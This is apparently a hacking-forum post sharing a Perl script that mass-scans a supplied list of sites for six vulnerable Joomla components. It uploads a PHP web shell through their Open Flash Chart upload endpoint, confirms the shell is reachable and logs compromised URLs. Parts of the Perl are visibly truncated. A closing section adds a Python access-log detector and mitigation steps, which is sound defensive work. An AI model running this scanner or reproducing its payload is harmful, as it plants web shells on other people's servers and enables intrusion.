
Perl M-A Joomla Rci Exploits Scanner

Status
Not open for further replies.

sQuo

Code:
>#!/usr/bin/perl# M-A_labz# This tool will scan for RCI in :# com_civicrm , com_acymailing , com_jnewsletter , com_jinc , com_maianmedia , com_jnews# http://upload.traidnt.net/upfiles/LVc77789.png# Author : b0y h4ck3ruse HTTP::Request;use LWP::Simple;use HTTP::Request::Common;use Term::ANSIColor;use Win32::Console::ANSI;$ua = LWP::UserAgent->new;print color("bold red"),"[+] M-A Joomla Components RCI Exploits Scanner \n";print color 'reset';print color("green"),"[+] Enter File : ";print color 'reset';$file=;chomp($file);open (file, ";close file;foreach $webs (@file) {chomp $webs;$site = $webs;print color("green"), "[+] Scanning $site\n";print color 'reset';@paths=('/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php');foreach $path(@paths){$site_vul = "http://".$site."".$path."?name=tt7.php";$data = "php code";$data.= ' Evil Upload ';$data.= ' Evil Upload ';$data.= '

'.php_uname().'
'; ";$data.= 'echo \'\'; ';$data.= 'echo \'\'; ';$data.= "if( \$_POST['_upl'] == \"Upload\" ) { ";$data.= "if(\@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo 'Upload Succesfully !!!

'; } ";$data.= "else { echo 'Upload Fail !!!

'; } ";$data.= " } ";$data.= "?>";$res = $ua->request(POST $site_vul,Content_Type => 'text/plain', Content => $data);if ($res->is_success){print color("green"), "[+] $site is vul\n";print color 'reset';@vulns=('/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/tt7.php','/administrator/components/com_acymailing/inc/openflash/tmp-upload-images/tt7.php','/administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/tt7.php','/administrator/components/com_jinc/classes/graphics/tmp-upload-images/tt7.php','/administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/tt7.php','/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/tt7.php');foreach $vul(@vulns){$url = "http://".$site. $vul;$request = HTTP::Request->new(GET=>$url);$useragent = LWP::UserAgent->new();$response = $useragent->request($request);if ($response->content=~m/Evil Upload/g){print color("green"), "[+] Found => $url\n\n";print color 'reset';open(BEN,">>result-$site.txt");print BEN "$url\n";close(BEN);}else{print "[-] Not Found \n";}}}}}
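For defenders, the request pattern this script produces is easy to spot in web server logs: a POST to `ofc_upload_image.php` with a `name` parameter ending in a script extension, then a GET for that file under `tmp-upload-images/`. The following is an added example, not part of the original post. It assumes Apache/Nginx combined log format, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined-log-format prefix: client, request method, request target, status.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
UPLOADER = "/php-ofc-library/ofc_upload_image.php"   # endpoint named in the post
DROP_DIR = "/tmp-upload-images/"                      # where uploads land
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)

def scan(lines):
    """Return (line_no, client, kind, status, filename) for suspicious requests."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format access log line
        client, method, target, status = m.groups()
        url = urlsplit(target)
        path = url.path.lower()
        if path.endswith(UPLOADER) and method == "POST":
            name = parse_qs(url.query).get("name", [""])[0]
            kind = "script-upload" if SCRIPT_EXT.search(name) else "uploader-post"
            findings.append((n, client, kind, status, name))
        elif DROP_DIR in path and SCRIPT_EXT.search(path):
            # A script requested from the chart temp directory is never normal;
            # a 200 means the file exists and the server served or ran it.
            kind = "dropped-script-hit" if status == "200" else "dropped-script-probe"
            findings.append((n, client, kind, status, path.rsplit("/", 1)[1]))
    return findings

# Constructed sample log lines (documentation address ranges, not real traffic).
BASE = "/administrator/components/com_jnews/includes/openflashchart"
SAMPLE = [
    f'203.0.113.7 - - [10/Mar/2013:04:12:01 +0000] "POST {BASE}/php-ofc-library/ofc_upload_image.php?name=tt7.php HTTP/1.1" 200 12 "-" "libwww-perl/6.04"',
    f'203.0.113.7 - - [10/Mar/2013:04:12:02 +0000] "GET {BASE}/tmp-upload-images/tt7.php HTTP/1.1" 200 431 "-" "libwww-perl/6.04"',
    '198.51.100.20 - - [10/Mar/2013:04:12:05 +0000] "GET /index.php HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Mar/2013:04:12:06 +0000] "GET /administrator/components/com_jinc/classes/graphics/tmp-upload-images/tt7.php HTTP/1.1" 404 210 "-" "libwww-perl/6.04"',
    f'198.51.100.20 - - [10/Mar/2013:04:13:00 +0000] "POST {BASE}/php-ofc-library/ofc_upload_image.php?name=chart.png HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding, sep="\t")
```

Any `dropped-script-hit` should be treated as a likely compromise of that host. Removing the bundled `php-ofc-library` upload script, or denying script execution in `tmp-upload-images/`, closes the path the scanner relies on.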
 